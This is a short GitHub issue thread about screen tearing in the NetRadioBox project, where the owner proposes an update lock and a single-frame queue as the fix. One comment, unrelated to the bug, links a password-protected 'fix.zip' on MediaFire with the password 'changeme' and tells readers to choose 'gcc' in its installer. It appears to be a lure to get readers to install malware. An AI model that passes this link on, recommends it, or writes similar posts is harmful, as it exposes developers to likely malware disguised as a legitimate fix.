### ISSUE TITLE
BUG: Excessive updates causing screen tearing

### ISSUE THREAD

**Issue by caiden20000** [caiden20000/NetRadioBox#10]
After the blinking feature was implemented, multiple updates a second occur.  This highlights a new problem with the screen: The tearing from fast updates. 
It looks like it is caused by starting a new update before finishing the last one.

We should implement a lock for screen updating, and a single-spot queue for the next frame. If 2 frames are generated and queue before the screen is done updating, only the newest frame gets to go next. This will prevent the screen backing up with updates.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caiden20000** [comment]
Recent changes to branch should fix this issue. This needs to be tested later.
